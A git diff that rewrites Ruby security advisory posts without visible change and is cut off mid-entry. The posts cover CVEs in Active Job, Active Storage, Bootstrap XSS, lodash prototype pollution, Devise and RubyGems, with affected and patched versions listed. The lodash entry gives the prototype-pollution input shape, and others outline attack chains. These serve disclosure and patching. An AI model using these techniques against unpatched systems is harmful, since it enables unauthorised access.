diff --git a/advisories/_posts/2018-11-27-CVE-2018-16476.md b/advisories/_posts/2018-11-27-CVE-2018-16476.md
index 55a163fb..0f470dc2 100644
--- a/advisories/_posts/2018-11-27-CVE-2018-16476.md
+++ b/advisories/_posts/2018-11-27-CVE-2018-16476.md
@@ -1,45 +1,45 @@
----
-layout: advisory
-title: 'CVE-2018-16476 (activejob): Broken Access Control vulnerability in Active
-  Job'
-comments: false
-categories:
-- activejob
-- rails
-advisory:
-  gem: activejob
-  framework: rails
-  cve: 2018-16476
-  ghsa: q2qw-rmrh-vv42
-  url: https://groups.google.com/forum/#!topic/rubyonrails-security/FL4dSdzr2zw
-  title: Broken Access Control vulnerability in Active Job
-  date: 2018-11-27
-  description: |
-    There is a vulnerability in Active Job. This vulnerability has been
-    assigned the CVE identifier CVE-2018-16476.
-
-    Versions Affected: >= 4.2.0
-    Not affected: < 4.2.0
-    Fixed Versions: 4.2.11, 5.0.7.1, 5.1.6.1, 5.2.1.1
-
-    Impact
-    ------
-    Carefully crafted user input can cause Active Job to deserialize it using GlobalId
-    and allow an attacker to have access to information that they should not have.
-
-    Vulnerable code will look something like this:
-
-        MyJob.perform_later(user_input)
-
-    All users running an affected release should either upgrade or use one of the
-    workarounds immediately.
-  cvss_v3: 7.5
-  unaffected_versions:
-  - "< 4.2.0"
-  patched_versions:
-  - "~> 4.2.11"
-  - "~> 5.0.7.1"
-  - "~> 5.1.6.1"
-  - "~> 5.1.7"
-  - ">= 5.2.1.1"
----
+---
+layout: advisory
+title: 'CVE-2018-16476 (activejob): Broken Access Control vulnerability in Active
+  Job'
+comments: false
+categories:
+- activejob
+- rails
+advisory:
+  gem: activejob
+  framework: rails
+  cve: 2018-16476
+  ghsa: q2qw-rmrh-vv42
+  url: https://groups.google.com/forum/#!topic/rubyonrails-security/FL4dSdzr2zw
+  title: Broken Access Control vulnerability in Active Job
+  date: 2018-11-27
+  description: |
+    There is a vulnerability in Active Job. This vulnerability has been
+    assigned the CVE identifier CVE-2018-16476.
+
+    Versions Affected: >= 4.2.0
+    Not affected: < 4.2.0
+    Fixed Versions: 4.2.11, 5.0.7.1, 5.1.6.1, 5.2.1.1
+
+    Impact
+    ------
+    Carefully crafted user input can cause Active Job to deserialize it using GlobalId
+    and allow an attacker to have access to information that they should not have.
+
+    Vulnerable code will look something like this:
+
+        MyJob.perform_later(user_input)
+
+    All users running an affected release should either upgrade or use one of the
+    workarounds immediately.
+  cvss_v3: 7.5
+  unaffected_versions:
+  - "< 4.2.0"
+  patched_versions:
+  - "~> 4.2.11"
+  - "~> 5.0.7.1"
+  - "~> 5.1.6.1"
+  - "~> 5.1.7"
+  - ">= 5.2.1.1"
+---
diff --git a/advisories/_posts/2018-11-27-CVE-2018-16477.md b/advisories/_posts/2018-11-27-CVE-2018-16477.md
index 72f859a5..fcfded2c 100644
--- a/advisories/_posts/2018-11-27-CVE-2018-16477.md
+++ b/advisories/_posts/2018-11-27-CVE-2018-16477.md
@@ -1,50 +1,50 @@
----
-layout: advisory
-title: 'CVE-2018-16477 (activestorage): Bypass vulnerability in Active Storage'
-comments: false
-categories:
-- activestorage
-- rails
-advisory:
-  gem: activestorage
-  framework: rails
-  cve: 2018-16477
-  ghsa: 7rr7-rcjw-56vj
-  url: https://groups.google.com/forum/#!topic/rubyonrails-security/3KQRnXDIuLg
-  title: Bypass vulnerability in Active Storage
-  date: 2018-11-27
-  description: |
-    There is a vulnerability in Active Storage. This vulnerability has been
-    assigned the CVE identifier CVE-2018-16477.
-
-    Versions Affected:  >= 5.2.0
-    Not affected:       < 5.2.0
-    Fixed Versions:     5.2.1.1
-
-    Impact
-    ------
-    Signed download URLs generated by `ActiveStorage` for Google Cloud Storage
-    service and Disk service include `content-disposition` and `content-type`
-    parameters that an attacker can modify. This can be used to upload specially
-    crafted HTML files and have them served and executed inline. Combined with
-    other techniques such as cookie bombing and specially crafted AppCache manifests,
-    an attacker can gain access to private signed URLs within a specific storage path.
-
-    Vulnerable apps are those using either GCS or the Disk service in production.
-    Other storage services such as S3 or Azure aren't affected.
-
-    All users running an affected release should either upgrade or use one of the
-    workarounds immediately. For those using GCS, it's also recommended to run the
-    following to update existing blobs:
-
-    ```
-    ActiveStorage::Blob.find_each do |blob|
-      blob.send :update_service_metadata
-    end
-    ```
-  cvss_v3: 6.5
-  unaffected_versions:
-  - "< 5.2.0"
-  patched_versions:
-  - ">= 5.2.1.1"
----
+---
+layout: advisory
+title: 'CVE-2018-16477 (activestorage): Bypass vulnerability in Active Storage'
+comments: false
+categories:
+- activestorage
+- rails
+advisory:
+  gem: activestorage
+  framework: rails
+  cve: 2018-16477
+  ghsa: 7rr7-rcjw-56vj
+  url: https://groups.google.com/forum/#!topic/rubyonrails-security/3KQRnXDIuLg
+  title: Bypass vulnerability in Active Storage
+  date: 2018-11-27
+  description: |
+    There is a vulnerability in Active Storage. This vulnerability has been
+    assigned the CVE identifier CVE-2018-16477.
+
+    Versions Affected:  >= 5.2.0
+    Not affected:       < 5.2.0
+    Fixed Versions:     5.2.1.1
+
+    Impact
+    ------
+    Signed download URLs generated by `ActiveStorage` for Google Cloud Storage
+    service and Disk service include `content-disposition` and `content-type`
+    parameters that an attacker can modify. This can be used to upload specially
+    crafted HTML files and have them served and executed inline. Combined with
+    other techniques such as cookie bombing and specially crafted AppCache manifests,
+    an attacker can gain access to private signed URLs within a specific storage path.
+
+    Vulnerable apps are those using either GCS or the Disk service in production.
+    Other storage services such as S3 or Azure aren't affected.
+
+    All users running an affected release should either upgrade or use one of the
+    workarounds immediately. For those using GCS, it's also recommended to run the
+    following to update existing blobs:
+
+    ```
+    ActiveStorage::Blob.find_each do |blob|
+      blob.send :update_service_metadata
+    end
+    ```
+  cvss_v3: 6.5
+  unaffected_versions:
+  - "< 5.2.0"
+  patched_versions:
+  - ">= 5.2.1.1"
+---
diff --git a/advisories/_posts/2019-01-17-CVE-2018-20676.md b/advisories/_posts/2019-01-17-CVE-2018-20676.md
index b123a970..7351745d 100644
--- a/advisories/_posts/2019-01-17-CVE-2018-20676.md
+++ b/advisories/_posts/2019-01-17-CVE-2018-20676.md
@@ -1,38 +1,38 @@
----
-layout: advisory
-title: 'CVE-2018-20676 (bootstrap): XSS vulnerability that affects bootstrap'
-comments: false
-categories:
-- bootstrap
-advisory:
-  gem: bootstrap
-  cve: 2018-20676
-  ghsa: 3mgp-fx93-9xv5
-  url: https://github.com/advisories/GHSA-3mgp-fx93-9xv5
-  title: XSS vulnerability that affects bootstrap
-  date: 2019-01-17
-  description: |
-    In Bootstrap before 3.4.0, XSS is possible in the tooltip data-viewport
-    attribute.
-  cvss_v2: 4.3
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 3.4.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2018-20676
-    - https://github.com/twbs/bootstrap/issues/27044
-    - https://github.com/twbs/bootstrap/issues/27915#issuecomment-452140906
-    - https://github.com/twbs/bootstrap/issues/27915#issuecomment-452196628
-    - https://github.com/twbs/bootstrap/pull/27047
-    - https://access.redhat.com/errata/RHBA-2019:1076
-    - https://access.redhat.com/errata/RHBA-2019:1570
-    - https://access.redhat.com/errata/RHSA-2019:1456
-    - https://access.redhat.com/errata/RHSA-2019:3023
-    - https://access.redhat.com/errata/RHSA-2020:0132
-    - https://access.redhat.com/errata/RHSA-2020:0133
-    - https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@
-    - https://github.com/twbs/bootstrap/commit/2a5ba23ce8f041f3548317acc992ed8a736b609d
-    - https://blog.getbootstrap.com/2018/12/13/bootstrap-3-4-0
-    - https://github.com/advisories/GHSA-3mgp-fx93-9xv5
----
+---
+layout: advisory
+title: 'CVE-2018-20676 (bootstrap): XSS vulnerability that affects bootstrap'
+comments: false
+categories:
+- bootstrap
+advisory:
+  gem: bootstrap
+  cve: 2018-20676
+  ghsa: 3mgp-fx93-9xv5
+  url: https://github.com/advisories/GHSA-3mgp-fx93-9xv5
+  title: XSS vulnerability that affects bootstrap
+  date: 2019-01-17
+  description: |
+    In Bootstrap before 3.4.0, XSS is possible in the tooltip data-viewport
+    attribute.
+  cvss_v2: 4.3
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 3.4.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-20676
+    - https://github.com/twbs/bootstrap/issues/27044
+    - https://github.com/twbs/bootstrap/issues/27915#issuecomment-452140906
+    - https://github.com/twbs/bootstrap/issues/27915#issuecomment-452196628
+    - https://github.com/twbs/bootstrap/pull/27047
+    - https://access.redhat.com/errata/RHBA-2019:1076
+    - https://access.redhat.com/errata/RHBA-2019:1570
+    - https://access.redhat.com/errata/RHSA-2019:1456
+    - https://access.redhat.com/errata/RHSA-2019:3023
+    - https://access.redhat.com/errata/RHSA-2020:0132
+    - https://access.redhat.com/errata/RHSA-2020:0133
+    - https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@
+    - https://github.com/twbs/bootstrap/commit/2a5ba23ce8f041f3548317acc992ed8a736b609d
+    - https://blog.getbootstrap.com/2018/12/13/bootstrap-3-4-0
+    - https://github.com/advisories/GHSA-3mgp-fx93-9xv5
+---
diff --git a/advisories/_posts/2019-01-17-CVE-2018-20677.md b/advisories/_posts/2019-01-17-CVE-2018-20677.md
index 31ed69fb..8ffd69bb 100644
--- a/advisories/_posts/2019-01-17-CVE-2018-20677.md
+++ b/advisories/_posts/2019-01-17-CVE-2018-20677.md
@@ -1,39 +1,39 @@
----
-layout: advisory
-title: 'CVE-2018-20677 (bootstrap): bootstrap Cross-site Scripting vulnerability'
-comments: false
-categories:
-- bootstrap
-advisory:
-  gem: bootstrap
-  cve: 2018-20677
-  ghsa: ph58-4vrj-w6hr
-  url: https://github.com/advisories/GHSA-ph58-4vrj-w6hr
-  title: bootstrap Cross-site Scripting vulnerability
-  date: 2019-01-17
-  description: |
-    In Bootstrap before 3.4.0, XSS is possible in the affix
-    configuration target property.
-  cvss_v2: 4.3
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 3.4.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2018-20677
-    - https://github.com/twbs/bootstrap/issues/27045
-    - https://github.com/twbs/bootstrap/issues/27915#issuecomment-452140906
-    - https://github.com/twbs/bootstrap/issues/27915#issuecomment-452196628
-    - https://github.com/twbs/bootstrap/pull/27047
-    - https://access.redhat.com/errata/RHBA-2019:1076
-    - https://access.redhat.com/errata/RHBA-2019:1570
-    - https://access.redhat.com/errata/RHSA-2019:1456
-    - https://access.redhat.com/errata/RHSA-2019:3023
-    - https://access.redhat.com/errata/RHSA-2020:0132
-    - https://access.redhat.com/errata/RHSA-2020:0133
-    - https://lists.apache.org/thread.html/52e0e6b5df827ee7f1e68f7cc3babe61af3b2160f5d74a85469b7b0e@
-    - https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@
-    - https://github.com/twbs/bootstrap/commit/2a5ba23ce8f041f3548317acc992ed8a736b609d
-    - https://blog.getbootstrap.com/2018/12/13/bootstrap-3-4-0
-    - https://github.com/advisories/GHSA-ph58-4vrj-w6hr
----
+---
+layout: advisory
+title: 'CVE-2018-20677 (bootstrap): bootstrap Cross-site Scripting vulnerability'
+comments: false
+categories:
+- bootstrap
+advisory:
+  gem: bootstrap
+  cve: 2018-20677
+  ghsa: ph58-4vrj-w6hr
+  url: https://github.com/advisories/GHSA-ph58-4vrj-w6hr
+  title: bootstrap Cross-site Scripting vulnerability
+  date: 2019-01-17
+  description: |
+    In Bootstrap before 3.4.0, XSS is possible in the affix
+    configuration target property.
+  cvss_v2: 4.3
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 3.4.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-20677
+    - https://github.com/twbs/bootstrap/issues/27045
+    - https://github.com/twbs/bootstrap/issues/27915#issuecomment-452140906
+    - https://github.com/twbs/bootstrap/issues/27915#issuecomment-452196628
+    - https://github.com/twbs/bootstrap/pull/27047
+    - https://access.redhat.com/errata/RHBA-2019:1076
+    - https://access.redhat.com/errata/RHBA-2019:1570
+    - https://access.redhat.com/errata/RHSA-2019:1456
+    - https://access.redhat.com/errata/RHSA-2019:3023
+    - https://access.redhat.com/errata/RHSA-2020:0132
+    - https://access.redhat.com/errata/RHSA-2020:0133
+    - https://lists.apache.org/thread.html/52e0e6b5df827ee7f1e68f7cc3babe61af3b2160f5d74a85469b7b0e@
+    - https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@
+    - https://github.com/twbs/bootstrap/commit/2a5ba23ce8f041f3548317acc992ed8a736b609d
+    - https://blog.getbootstrap.com/2018/12/13/bootstrap-3-4-0
+    - https://github.com/advisories/GHSA-ph58-4vrj-w6hr
+---
diff --git a/advisories/_posts/2019-02-07-CVE-2018-16487.md b/advisories/_posts/2019-02-07-CVE-2018-16487.md
index 62af7df2..d28882e0 100644
--- a/advisories/_posts/2019-02-07-CVE-2018-16487.md
+++ b/advisories/_posts/2019-02-07-CVE-2018-16487.md
@@ -1,39 +1,39 @@
----
-layout: advisory
-title: 'CVE-2018-16487 (lodash-rails): Prototype Pollution in lodash'
-comments: false
-categories:
-- lodash-rails
-advisory:
-  gem: lodash-rails
-  cve: 2018-16487
-  ghsa: 4xc9-xhrj-v574
-  url: https://github.com/advisories/GHSA-4xc9-xhrj-v574
-  title: Prototype Pollution in lodash
-  date: 2019-02-07
-  description: |
-    Versions of `lodash` before 4.17.11 are vulnerable to
-    prototype pollution.
-
-    The vulnerable functions are 'defaultsDeep', 'merge', and
-    'mergeWith' which allow a malicious user to modify the
-    prototype of `Object` via `{constructor: {prototype:
-    {...}}}` causing the addition or modification of an existing
-    property that will exist on all objects.
-
-    ## Recommendation
-
-    Update to version 4.17.11 or later.
-  cvss_v2: 6.8
-  cvss_v3: 5.6
-  patched_versions:
-  - ">= 4.17.11"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2018-16487
-    - https://hackerone.com/reports/380873
-    - https://www.npmjs.com/advisories/782
-    - https://github.com/lodash/lodash/commit/90e6199a161b6445b01454517b40ef65ebecd2ad
-    - https://security.netapp.com/advisory/ntap-20190919-0004
-    - https://github.com/advisories/GHSA-4xc9-xhrj-v574
----
+---
+layout: advisory
+title: 'CVE-2018-16487 (lodash-rails): Prototype Pollution in lodash'
+comments: false
+categories:
+- lodash-rails
+advisory:
+  gem: lodash-rails
+  cve: 2018-16487
+  ghsa: 4xc9-xhrj-v574
+  url: https://github.com/advisories/GHSA-4xc9-xhrj-v574
+  title: Prototype Pollution in lodash
+  date: 2019-02-07
+  description: |
+    Versions of `lodash` before 4.17.11 are vulnerable to
+    prototype pollution.
+
+    The vulnerable functions are 'defaultsDeep', 'merge', and
+    'mergeWith' which allow a malicious user to modify the
+    prototype of `Object` via `{constructor: {prototype:
+    {...}}}` causing the addition or modification of an existing
+    property that will exist on all objects.
+
+    ## Recommendation
+
+    Update to version 4.17.11 or later.
+  cvss_v2: 6.8
+  cvss_v3: 5.6
+  patched_versions:
+  - ">= 4.17.11"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-16487
+    - https://hackerone.com/reports/380873
+    - https://www.npmjs.com/advisories/782
+    - https://github.com/lodash/lodash/commit/90e6199a161b6445b01454517b40ef65ebecd2ad
+    - https://security.netapp.com/advisory/ntap-20190919-0004
+    - https://github.com/advisories/GHSA-4xc9-xhrj-v574
+---
diff --git a/advisories/_posts/2019-02-07-CVE-2019-5421.md b/advisories/_posts/2019-02-07-CVE-2019-5421.md
index 2892d15f..ac1dc3d7 100644
--- a/advisories/_posts/2019-02-07-CVE-2019-5421.md
+++ b/advisories/_posts/2019-02-07-CVE-2019-5421.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2019-5421 (devise): Devise Gem for Ruby Time-of-check Time-of-use race
-  condition with lockable module'
-comments: false
-categories:
-- devise
-advisory:
-  gem: devise
-  cve: 2019-5421
-  ghsa: 73rf-6mrf-759q
-  url: https://github.com/plataformatec/devise/issues/4981
-  title: Devise Gem for Ruby Time-of-check Time-of-use race condition with lockable
-    module
-  date: 2019-02-07
-  description: |
-    Devise ruby gem before 4.6.0 when the `lockable` module is used is vulnerable to a
-    time-of-check time-of-use (TOCTOU) race condition due to `increment_failed_attempts`
-    within the `Devise::Models::Lockable` class not being concurrency safe.
-  cvss_v2: 7.5
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 4.6.0"
----
+---
+layout: advisory
+title: 'CVE-2019-5421 (devise): Devise Gem for Ruby Time-of-check Time-of-use race
+  condition with lockable module'
+comments: false
+categories:
+- devise
+advisory:
+  gem: devise
+  cve: 2019-5421
+  ghsa: 73rf-6mrf-759q
+  url: https://github.com/plataformatec/devise/issues/4981
+  title: Devise Gem for Ruby Time-of-check Time-of-use race condition with lockable
+    module
+  date: 2019-02-07
+  description: |
+    Devise ruby gem before 4.6.0 when the `lockable` module is used is vulnerable to a
+    time-of-check time-of-use (TOCTOU) race condition due to `increment_failed_attempts`
+    within the `Devise::Models::Lockable` class not being concurrency safe.
+  cvss_v2: 7.5
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 4.6.0"
+---
diff --git a/advisories/_posts/2019-02-15-CVE-2019-8331.md b/advisories/_posts/2019-02-15-CVE-2019-8331.md
index fa65218d..23622fae 100644
--- a/advisories/_posts/2019-02-15-CVE-2019-8331.md
+++ b/advisories/_posts/2019-02-15-CVE-2019-8331.md
@@ -1,35 +1,35 @@
----
-layout: advisory
-title: 'CVE-2019-8331 (twitter-bootstrap-rails): twitter-bootstrap-rails vulnerable
-  to Cross-Site Scripting (XSS)'
-comments: false
-categories:
-- twitter-bootstrap-rails
-advisory:
-  gem: twitter-bootstrap-rails
-  cve: 2019-8331
-  ghsa: 9v3m-8fp8-mj99
-  url: https://blog.getbootstrap.com/2019/02/13/bootstrap-4-3-1-and-3-4-1/
-  title: twitter-bootstrap-rails vulnerable to Cross-Site Scripting (XSS)
-  date: 2019-02-15
-  description: |
-    The seyhunak/twitter-bootstrap-rails gem includes a vendored version of
-    the Bootstrap JavaScript library.
-
-    In Bootstrap before 3.4.1 and 4.3.x before 4.3.1, XSS is possible
-    in the tooltip or popover data-template attribute.
-
-    The most recent version of this gem, 5.0.0, includes Bootstrap v 3.3.6.
-    All versions of Bootstrap before v 3.4.1 are affected by this vulnerability.
-    All versions of this gem are affected.
-
-    # Workarounds
-    Until this gem is updated to use Bootstrap v3.4.1, users can replace it
-    with the official Twitter-maintained gems, `bootstrap-sass` (version 3.4.1)
-    or `bootstrap` (bootstrap 4 and 5).
-  cvss_v2: 4.3
-  cvss_v3: 6.1
-  related:
-    url:
-    - https://github.com/twbs/bootstrap-sass/releases/tag/v3.4.1
----
+---
+layout: advisory
+title: 'CVE-2019-8331 (twitter-bootstrap-rails): twitter-bootstrap-rails vulnerable
+  to Cross-Site Scripting (XSS)'
+comments: false
+categories:
+- twitter-bootstrap-rails
+advisory:
+  gem: twitter-bootstrap-rails
+  cve: 2019-8331
+  ghsa: 9v3m-8fp8-mj99
+  url: https://blog.getbootstrap.com/2019/02/13/bootstrap-4-3-1-and-3-4-1/
+  title: twitter-bootstrap-rails vulnerable to Cross-Site Scripting (XSS)
+  date: 2019-02-15
+  description: |
+    The seyhunak/twitter-bootstrap-rails gem includes a vendored version of
+    the Bootstrap JavaScript library.
+
+    In Bootstrap before 3.4.1 and 4.3.x before 4.3.1, XSS is possible
+    in the tooltip or popover data-template attribute.
+
+    The most recent version of this gem, 5.0.0, includes Bootstrap v 3.3.6.
+    All versions of Bootstrap before v 3.4.1 are affected by this vulnerability.
+    All versions of this gem are affected.
+
+    # Workarounds
+    Until this gem is updated to use Bootstrap v3.4.1, users can replace it
+    with the official Twitter-maintained gems, `bootstrap-sass` (version 3.4.1)
+    or `bootstrap` (bootstrap 4 and 5).
+  cvss_v2: 4.3
+  cvss_v3: 6.1
+  related:
+    url:
+    - https://github.com/twbs/bootstrap-sass/releases/tag/v3.4.1
+---
diff --git a/advisories/_posts/2019-03-05-CVE-2019-8320.md b/advisories/_posts/2019-03-05-CVE-2019-8320.md
index 85717233..38038934 100644
--- a/advisories/_posts/2019-03-05-CVE-2019-8320.md
+++ b/advisories/_posts/2019-03-05-CVE-2019-8320.md
@@ -1,32 +1,32 @@
----
-layout: advisory
-title: 'CVE-2019-8320 (rubygems-update): Delete directory using symlink when decompressing
-  tar'
-comments: false
-categories:
-- rubygems-update
-- rubygems
-advisory:
-  gem: rubygems-update
-  library: rubygems
-  cve: 2019-8320
-  ghsa: 5x32-c9mf-49cc
-  url: https://blog.rubygems.org/2019/03/05/security-advisories-2019-03.html
-  title: Delete directory using symlink when decompressing tar
-  date: 2019-03-05
-  description: |
-    A Directory Traversal issue was discovered in RubyGems 2.7.6 and later
-    through 3.0.2. Before making new directories or touching files (which now
-    include path-checking code for symlinks), it would delete the target
-    destination. If that destination was hidden behind a symlink, a malicious gem
-    could delete arbitrary files on the user’s machine, presuming the attacker
-    could guess at paths. Given how frequently gem is run as sudo, and how
-    predictable paths are on modern systems (/tmp, /usr, etc.), this could
-    likely lead to data loss or an unusable system.
-  cvss_v3: 7.4
-  unaffected_versions:
-  - "< 2.7.6"
-  patched_versions:
-  - ">= 3.0.3"
-  - "~> 2.7.9"
----
+---
+layout: advisory
+title: 'CVE-2019-8320 (rubygems-update): Delete directory using symlink when decompressing
+  tar'
+comments: false
+categories:
+- rubygems-update
+- rubygems
+advisory:
+  gem: rubygems-update
+  library: rubygems
+  cve: 2019-8320
+  ghsa: 5x32-c9mf-49cc
+  url: https://blog.rubygems.org/2019/03/05/security-advisories-2019-03.html
+  title: Delete directory using symlink when decompressing tar
+  date: 2019-03-05
+  description: |
+    A Directory Traversal issue was discovered in RubyGems 2.7.6 and later
+    through 3.0.2. Before making new directories or touching files (which now
+    include path-checking code for symlinks), it would delete the target
+    destination. If that destination was hidden behind a symlink, a malicious gem
+    could delete arbitrary files on the user’s machine, presuming the attacker
+    could guess at paths. Given how frequently gem is run as sudo, and how
+    predictable paths are on modern systems (/tmp, /usr, etc.), this could
+    likely lead to data loss or an unusable system.
+  cvss_v3: 7.4
+  unaffected_versions:
+  - "< 2.7.6"
+  patched_versions:
+  - ">= 3.0.3"
+  - "~> 2.7.9"
+---
diff --git a/advisories/_posts/2019-03-05-CVE-2019-8321.md b/advisories/_posts/2019-03-05-CVE-2019-8321.md
index 081187f4..95b9443a 100644
--- a/advisories/_posts/2019-03-05-CVE-2019-8321.md
+++ b/advisories/_posts/2019-03-05-CVE-2019-8321.md
@@ -1,27 +1,27 @@
----
-layout: advisory
-title: 'CVE-2019-8321 (rubygems-update): Escape sequence injection vulnerability in
-  verbose'
-comments: false
-categories:
-- rubygems-update
-- rubygems
-advisory:
-  gem: rubygems-update
-  library: rubygems
-  cve: 2019-8321
-  ghsa: fr32-gr5c-xq5c
-  url: https://blog.rubygems.org/2019/03/05/security-advisories-2019-03.html
-  title: Escape sequence injection vulnerability in verbose
-  date: 2019-03-05
-  description: |
-    An issue was discovered in RubyGems 2.6 and later through 3.0.2. Since
-    Gem::UserInteraction#verbose calls say without escaping, escape sequence
-    injection is possible.
-  cvss_v3: 7.5
-  unaffected_versions:
-  - "< 2.6"
-  patched_versions:
-  - ">= 3.0.3"
-  - "~> 2.7.9"
----
+---
+layout: advisory
+title: 'CVE-2019-8321 (rubygems-update): Escape sequence injection vulnerability in
+  verbose'
+comments: false
+categories:
+- rubygems-update
+- rubygems
+advisory:
+  gem: rubygems-update
+  library: rubygems
+  cve: 2019-8321
+  ghsa: fr32-gr5c-xq5c
+  url: https://blog.rubygems.org/2019/03/05/security-advisories-2019-03.html
+  title: Escape sequence injection vulnerability in verbose
+  date: 2019-03-05
+  description: |
+    An issue was discovered in RubyGems 2.6 and later through 3.0.2. Since
+    Gem::UserInteraction#verbose calls say without escaping, escape sequence
+    injection is possible.
+  cvss_v3: 7.5
+  unaffected_versions:
+  - "< 2.6"
+  patched_versions:
+  - ">= 3.0.3"
+  - "~> 2.7.9"
+---
diff --git a/advisories/_posts/2019-03-05-CVE-2019-8322.md b/advisories/_posts/2019-03-05-CVE-2019-8322.md
index 8a9e03eb..a4b1d2b7 100644
--- a/advisories/_posts/2019-03-05-CVE-2019-8322.md
+++ b/advisories/_posts/2019-03-05-CVE-2019-8322.md
@@ -1,27 +1,27 @@
----
-layout: advisory
-title: 'CVE-2019-8322 (rubygems-update): Escape sequence injection vulnerability in
-  gem owner'
-comments: false
-categories:
-- rubygems-update
-- rubygems
-advisory:
-  gem: rubygems-update
-  library: rubygems
-  cve: 2019-8322
-  ghsa: mh37-8c3g-3fgc
-  url: https://blog.rubygems.org/2019/03/05/security-advisories-2019-03.html
-  title: Escape sequence injection vulnerability in gem owner
-  date: 2019-03-05
-  description: |
-    An issue was discovered in RubyGems 2.6 and later through 3.0.2. The gem
-    owner command outputs the contents of the API response directly to stdout.
-    Therefore, if the response is crafted, escape sequence injection may occur.
-  cvss_v3: 7.5
-  unaffected_versions:
-  - "< 2.6"
-  patched_versions:
-  - "~> 2.7.9"
-  - ">= 3.0.3"
----
+---
+layout: advisory
+title: 'CVE-2019-8322 (rubygems-update): Escape sequence injection vulnerability in
+  gem owner'
+comments: false
+categories:
+- rubygems-update
+- rubygems
+advisory:
+  gem: rubygems-update
+  library: rubygems
+  cve: 2019-8322
+  ghsa: mh37-8c3g-3fgc
+  url: https://blog.rubygems.org/2019/03/05/security-advisories-2019-03.html
+  title: Escape sequence injection vulnerability in gem owner
+  date: 2019-03-05
+  description: |
+    An issue was discovered in RubyGems 2.6 and later through 3.0.2. The gem
+    owner command outputs the contents of the API response directly to stdout.
+    Therefore, if the response is crafted, escape sequence injection may occur.
+  cvss_v3: 7.5
+  unaffected_versions:
+  - "< 2.6"
+  patched_versions:
+  - "~> 2.7.9"
+  - ">= 3.0.3"
+---
diff --git a/advisories/_posts/2019-03-05-CVE-2019-8323.md b/advisories/_posts/2019-03-05-CVE-2019-8323.md
index a7c41697..8c5b2fa1 100644
--- a/advisories/_posts/2019-03-05-CVE-2019-8323.md
+++ b/advisories/_posts/2019-03-05-CVE-2019-8323.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'CVE-2019-8323 (rubygems-update): Escape sequence injection vulnerability in
-  api response handling'
-comments: false
-categories:
-- rubygems-update
-- rubygems
-advisory:
-  gem: rubygems-update
-  library: rubygems
-  cve: 2019-8323
-  ghsa: 3h4r-pjv6-cph9
-  url: https://blog.rubygems.org/2019/03/05/security-advisories-2019-03.html
-  title: Escape sequence injection vulnerability in api response handling
-  date: 2019-03-05
-  description: |
-    An issue was discovered in RubyGems 2.6 and later through 3.0.2.
-    Gem::GemcutterUtilities#with_response may output the API response to stdout
-    as it is. Therefore, if the API side modifies the response, escape sequence
-    injection may occur.
-  cvss_v3: 7.5
-  unaffected_versions:
-  - "< 2.6"
-  patched_versions:
-  - ">= 3.0.3"
-  - "~> 2.7.9"
----
+---
+layout: advisory
+title: 'CVE-2019-8323 (rubygems-update): Escape sequence injection vulnerability in
+  api response handling'
+comments: false
+categories:
+- rubygems-update
+- rubygems
+advisory:
+  gem: rubygems-update
+  library: rubygems
+  cve: 2019-8323
+  ghsa: 3h4r-pjv6-cph9
+  url: https://blog.rubygems.org/2019/03/05/security-advisories-2019-03.html
+  title: Escape sequence injection vulnerability in api response handling
+  date: 2019-03-05
+  description: |
+    An issue was discovered in RubyGems 2.6 and later through 3.0.2.
+    Gem::GemcutterUtilities#with_response may output the API response to stdout
+    as it is. Therefore, if the API side modifies the response, escape sequence
+    injection may occur.
+  cvss_v3: 7.5
+  unaffected_versions:
+  - "< 2.6"
+  patched_versions:
+  - ">= 3.0.3"
+  - "~> 2.7.9"
+---
diff --git a/advisories/_posts/2019-03-05-CVE-2019-8324.md b/advisories/_posts/2019-03-05-CVE-2019-8324.md
index cfc7e736..99929540 100644
--- a/advisories/_posts/2019-03-05-CVE-2019-8324.md
+++ b/advisories/_posts/2019-03-05-CVE-2019-8324.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'CVE-2019-8324 (rubygems-update): Installing a malicious gem may lead to arbitrary
-  code execution'
-comments: false
-categories:
-- rubygems-update
-- rubygems
-advisory:
-  gem: rubygems-update
-  library: rubygems
-  cve: 2019-8324
-  ghsa: 76wm-422q-92mq
-  url: https://blog.rubygems.org/2019/03/05/security-advisories-2019-03.html
-  title: Installing a malicious gem may lead to arbitrary code execution
-  date: 2019-03-05
-  description: |
-    An issue was discovered in RubyGems 2.6 and later through 3.0.2. A crafted
-    gem with a multi-line name is not handled correctly. Therefore, an attacker
-    could inject arbitrary code to the stub line of gemspec, which is eval-ed by
-    code in ensure_loadable_spec during the preinstall check.
-  cvss_v3: 8.8
-  unaffected_versions:
-  - "< 2.6"
-  patched_versions:
-  - ">= 3.0.3"
-  - "~> 2.7.9"
----
+---
+layout: advisory
+title: 'CVE-2019-8324 (rubygems-update): Installing a malicious gem may lead to arbitrary
+  code execution'
+comments: false
+categories:
+- rubygems-update
+- rubygems
+advisory:
+  gem: rubygems-update
+  library: rubygems
+  cve: 2019-8324
+  ghsa: 76wm-422q-92mq
+  url: https://blog.rubygems.org/2019/03/05/security-advisories-2019-03.html
+  title: Installing a malicious gem may lead to arbitrary code execution
+  date: 2019-03-05
+  description: |
+    An issue was discovered in RubyGems 2.6 and later through 3.0.2. A crafted
+    gem with a multi-line name is not handled correctly. Therefore, an attacker
